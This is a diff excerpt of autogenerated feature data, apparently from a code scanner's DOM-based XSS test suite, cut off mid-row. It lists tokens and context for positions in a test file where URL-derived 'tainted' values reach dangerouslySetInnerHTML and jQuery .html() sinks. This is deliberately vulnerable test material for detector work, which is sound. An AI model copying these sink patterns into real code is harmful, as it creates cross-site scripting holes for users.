notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:13 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | $('myId') | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:21 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:26 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:26 | $('myId').html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:26 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:26 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:26 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | $('myId ... inted2) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | $('myId ... inted2) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | $('myId ... inted2) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | $('myId ... inted2) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | $('myId ... inted2) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | exceptional return of $('myId ... inted2) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | exceptional return of $('myId ... inted2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | exceptional return of $('myId ... inted2) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | exceptional return of $('myId ... inted2) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:47 | exceptional return of $('myId ... inted2) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:226:15:226:20 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:226:15:226:20 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:226:15:226:20 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16986,6 +117685,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:226:15:226:20 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:226:15:226:20 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:226:15:226:20 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:23:226:26 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:23:226:26 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:226:23:226:26 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:23:226:26 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:23:226:26 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:31 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:31 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:31 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:31 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:31 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:37 | this.props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:37 | this.props | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:37 | this.props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:37 | this.props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:28:226:37 | this.props | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:226:28:226:46 | this.props.tainted2 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:226:28:226:46 | this.props.tainted2 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:226:28:226:46 | this.props.tainted2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16993,6 +117707,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:226:28:226:46 | this.props.tainted2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:226:28:226:46 | this.props.tainted2 | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:226:28:226:46 | this.props.tainted2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:33:226:37 | props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:33:226:37 | props | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:226:33:226:37 | props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:33:226:37 | props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:33:226:37 | props | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:39:226:46 | tainted2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:39:226:46 | tainted2 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:226:39:226:46 | tainted2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:226:39:226:46 | tainted2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:226:39:226:46 | tainted2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:13 | $ | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:13 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:13 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | $('myId') | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:227:13:227:21 | 